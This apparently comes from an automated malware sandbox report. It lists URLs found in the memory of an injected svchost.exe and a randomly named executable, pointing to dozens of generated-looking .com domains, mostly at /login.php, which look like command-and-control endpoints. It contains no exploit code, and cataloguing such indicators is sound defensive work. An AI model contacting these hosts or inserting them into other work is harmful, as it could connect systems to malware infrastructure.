Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyvin.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598436167.000000000D628000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywad.com/login.php
Source: svchost.exe, 00000002.00000003.1806381048.000000000D673000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552121773.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559587168.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2076688408.00000000093E8000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008D3B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1932849520.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.2108379782.0000000008996000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lyryfyd.com/
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfyd.com/http://vopybyt.com/http://pujyjav.com/http://lyvytuj.com/http://lyvytuj.com/0
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1861091241.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881038659.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfyd.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/login.php
Source: svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547218137.0000000008B1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547224905.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrylix.com/
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrylix.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynad.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/H
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576652644.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryson.com/login.php
Source: svchost.exe, 00000002.00000003.1684990918.0000000008BC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664583329.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrysor.com/login.php
Source: svchost.exe, 00000002.00000003.1512721434.0000000008B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529606311.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512365775.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512224365.0000000008B68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529645254.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1513024330.0000000008B79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514730678.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512837473.0000000008B78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716704828.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycov.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710718578.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydag.com/
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydap.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygug.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjav.com/hZ
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujylog.com/http://pujylog.com/H
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujylyv.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujymiq.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybal.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumycav.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumycug.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumydyg.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygyp.com/
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygyp.com/H
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygyp.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjip.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjip.com/login.php?
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyliq.com/
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumypog.com/http://lysynur.com/http://lysynur.com/http://volykyc.com/http://lysynur.com/http:
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, 
ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086E7000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2076688408.0000000009441000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pumypog.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytup.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytyq.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywaq.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128124407.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywov.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.0000000009333000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, 
ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086E7000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086FA000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000DB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupybul.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupybyg.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycag.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycop.com/login.php
Source: svchost.exe, 00000002.00000003.1433180405.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1448284341.0000000008A7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433099437.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1828997616.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433689481.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710718578.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761273136.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664583329.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929371959.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724324245.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139975711.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydeq.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydev.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741281252.00000000008A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupygel.com/login.php
Source: svchost.exe, 00000002.00000003.1930409487.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjap.com/http://pupyjap.com/http://lykytin.com/http://lykytin.com/http://lykytin.com/http:
Source: svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupylug.com/p
